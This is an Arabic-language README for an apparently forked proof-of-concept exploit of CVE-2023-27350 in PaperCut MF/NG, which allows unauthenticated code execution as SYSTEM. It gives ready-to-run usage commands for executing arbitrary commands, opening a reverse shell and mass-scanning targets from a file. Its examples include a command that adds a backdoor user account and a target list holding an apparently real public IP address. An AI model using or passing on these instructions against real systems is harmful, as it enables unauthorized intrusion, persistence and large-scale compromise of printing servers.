
استغلال لـ Papercut CVE-2023-27350. [+] صدفة عكسية [+] فحص جماعي
هذا هو استغلال إثبات المفهوم (POC) لـ CVE-2023-27350، وهي ثغرة أمنية موجودة في PaperCut MF/NG تسمح لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية بصلاحيات SYSTEM.
قبل استخدام هذا الاستغلال، تأكد من تثبيت المكتبات التالية:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u، --url: عنوان URL لتطبيق PaperCut MF/NG المستهدف (على سبيل المثال، http://target-ip:9191).-c، --command: الأمر الذي سيتم تنفيذه على النظام المستهدف.--reverse-shell: استخدم حمولة قشرة عكسية لتنفيذ الأوامر على النظام المستهدف.-f، --file: فحص عدة أهداف من ملف (على سبيل المثال، file.txt).لتنفيذ أمر على النظام المستهدف، استخدم الخيار -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
لاستخدام حمولة قشرة عكسية لتنفيذ الأوامر على النظام المستهدف، استخدم الخيار --reverse-shell. سيُطلب منك إدخال عنوان IP ورقم المنفذ:
: : <> : <>
لفحص عدة أهداف من ملف، استخدم الخيار -f. يجب أن يكون تنسيق الملف ip_address:port:
python CVE-2023-27350.py -f file.txt
file.txtعند استخدام خيار الفحص الجماعي مع إدخال file.txt، تأكد من أن محتويات الملف منسقة بشكل صحيح.
يجب أن يحتوي كل سطر في الملف على عنوان IP ورقم منفذ الهدف، مفصولين بنقطتين رأسيتين :. على سبيل المثال:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
تأكد من عدم وجود مسافات أو أحرف إضافية بين عنوان IP والنقطتين الرأسيتين ورقم المنفذ. كذلك، تأكد من أن كل سطر يحتوي على عنوان IP واحد ورقم منفذ واحد فقط.
هذه نسخة متفرعة من مستودع horizon3ai/CVE-2023-27350. تعود جميع الاعتمادات في الاستغلال الأصلي إلى المؤلفين.